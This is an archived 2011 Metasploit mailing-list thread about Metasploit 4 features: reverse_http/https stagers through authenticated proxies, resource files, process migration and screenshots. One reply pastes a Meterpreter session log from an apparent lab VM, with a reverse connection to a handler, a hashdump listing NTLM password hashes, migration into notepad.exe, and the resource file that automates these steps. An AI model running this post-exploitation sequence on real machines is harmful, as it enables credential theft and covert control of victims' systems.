Metasploit mailing list archives
Re: News from Metasploit 4.
From: Richard Miles <richard.k.miles () googlemail com>
Date: Sat, 27 Aug 2011 16:40:11 -0500
Hi Carlos, Thanks for heads-up. But do you know why everytime that I call screenshot or screengrab the lynx browser is called? There is a way to disable it? run migrate -f crash here, so I have to use run post/windows/manage/migrate, but the old process name is still on the task manager list even when the migration is completed. Anyway to ask for run post/windows/manage/migrate kill the old process? Thanks On Sat, Aug 27, 2011 at 4:02 PM, Carlos Perez <dark0perator () pauldotcom com> wrote:
screenshot is now part of stdapi so need to load espia, migrate -f works finel for me msf exploit(handler) > [*] Sending stage (752128 bytes) to 192.168.1.115 [*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.115:1572) at 2011-08-27 17:00:17 -0400 [*] Session ID 2 (192.168.1.100:4444 -> 192.168.1.115:1572) processing AutoRunScript 'multi_console_command -rc /tmp/sample.rc' [*] Running Command List ... [*] Running command sysinfo Computer : CARLOS-192FCD91 OS : Windows XP (Build 2600, Service Pack 3). Architecture : x86 System Language : en_US Meterpreter : x86/win32 [*] Running command getuid Server username: CARLOS-192FCD91\Administrator [*] Running command load priv [-] The 'priv' extension has already been loaded. [*] Running command hashdump Administrator:500:bbc1afce0ca1e5eee694e8a550e822f3:7a118f7a2f2b34d61fa19b840b4f5203::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: HelpAssistant:1000:4ce17cdda3f0d92227a09c3d34957704:8fd71d48142454572de5fa172f579392::: HR:1003:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4::: SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:520e865e1977f048b70841950e491b2e::: [*] Running command run checkvm [*] Checking if target is a Virtual Machine ..... [*] This is a VMware Virtual Machine [*] Running command run migrate -f [*] Current server process: meter_mac1.exe (2752) [*] Spawning a notepad.exe host process... [*] Migrating into process ID 2896 [*] New server process: notepad.exe (2896) [*] Running command screenshot Screenshot saved to: /Users/carlos/Development/msf4/nGRCugLJ.jpeg msf exploit(handler) > cat /tmp/sample.rc [*] exec: cat /tmp/sample.rc sysinfo getuid load priv hashdump run checkvm run migrate -f screenshot msf exploit(handler) > On Aug 27, 2011, at 2:36 PM, Richard Miles wrote:Hi Carlos I know you are the creator of this resources and I have tested multi_console_command script and now the module post/multi/gather/run_console_rc_file, but they never worked to me. Maybe I'm doing something wrong. I tried call both of them before and after call "use exploit/multi/handler", and when I get the connection back from meterpreter nothing happens, the commands are never executed, or at least the output is never displayed on the screen. I'm feeling very foul. There is a chance for you show a step by step how do you make it? I tested both now again with metasploit 4. Thanks. On Fri, Aug 26, 2011 at 4:12 PM, Carlos Perez <dark0perator () pauldotcom com> wrote:AutoRunScript is for Meterpreter Scrips/Post Modules, what you are showing would be considered a resource file, look at the multi_console_command script or the post module post/multi/gather/run_console_rc_file to achieve what you want and use that resource file as an option. On Aug 26, 2011, at 4:10 PM, Richard Miles wrote:Hi Egypt, It's awesome, thanks for information. Also, do you have a working version for 64 bits? Any follow-up on the other 2 questions on the e-mail? Thanks On Fri, Aug 26, 2011 at 9:20 AM, <egypt () metasploit com> wrote:Yes, reverse_http(s) both use the WinInet API, and as such, use IE's proxy configuration, including credentials. egypt On Fri, Aug 26, 2011 at 2:28 AM, Richard Miles <richard.k.miles () googlemail com> wrote:Hey Patrick, Awesome, with the new reverse_http or reverse_https? Metasploit 4? Thanks On Thu, Aug 25, 2011 at 7:37 PM, Patrick Webster <patrick () aushack com> wrote:Hey Richard, I cannot guarantee 100%, but re: point #1, I have successfully used the stager to get around proxies with auth about 2 months ago. -Patrick On Fri, Aug 26, 2011 at 8:42 AM, Richard Miles <richard.k.miles () googlemail com> wrote:Hi I friend of mine was talking about some great improvements at Metasploit 4, I checked the blog and it talks very briefly about it, what more called my attention is that reverse_http and reverse_https was updated and meterpreter scripts / resources too. I have 3 questions... 1 - The new reverse_http and reverse_https now are as good as passiveX was? I mean, we can use it completely over http or https (even the stager) and the payload is smart enough to get proxy IP and port from browser and re-use the same credential (in case that proxy require auth)?_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework-----BEGIN PGP SIGNATURE----- iQEcBAEBAgAGBQJOWVtWAAoJEHEPn91U05XJ8N4H/0XVJN8rYFGxgWU8wHJ43Vui y5yaXFWMaZqm7OadfM3qlBbJ6vAi7YuIDMAZ/UQs4k167OCu/IsPMpG21iR7Wngt g2HlMCLLCoC74NNQ5gw9F5sAAAxSUe5HVUTXUFFTTA/ljrKg8FlpBH4sQGCngwMx aZfw6VWdVRZMEPynMxOPvqt4XCgNsWfAr0hKz5Bhm8kesUAm/xcAnA5RXQM6Ctb9 SYxAeLsBQ7qsVAv8XWJJRhaln838Ajh8ibDET2d37YKYkJ1VSChXVCstz1oCHhnB 34XDjfHwN90O4JD5r/tMtNKbeT+u222R2M3r+MjZKzTUxnmGxDEGbNMBOANXqrA= =AaQS -----END PGP SIGNATURE-----
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- News from Metasploit 4. Richard Miles (Aug 25)
- Re: News from Metasploit 4. Patrick Webster (Aug 25)
- Re: News from Metasploit 4. Richard Miles (Aug 26)
- Re: News from Metasploit 4. egypt (Aug 26)
- Re: News from Metasploit 4. Richard Miles (Aug 26)
- Message not available
- Re: News from Metasploit 4. Richard Miles (Aug 27)
- Message not available
- Re: News from Metasploit 4. Richard Miles (Aug 27)
- Re: News from Metasploit 4. Richard Miles (Aug 26)
- Re: News from Metasploit 4. Patrick Webster (Aug 25)
- Re: News from Metasploit 4. Richard Miles (Aug 26)
- Message not available
- Re: News from Metasploit 4. Richard Miles (Aug 27)
- Re: News from Metasploit 4. Richard Miles (Aug 27)
- Re: News from Metasploit 4. Carlos Perez (Aug 27)
- Re: News from Metasploit 4. Richard Miles (Aug 27)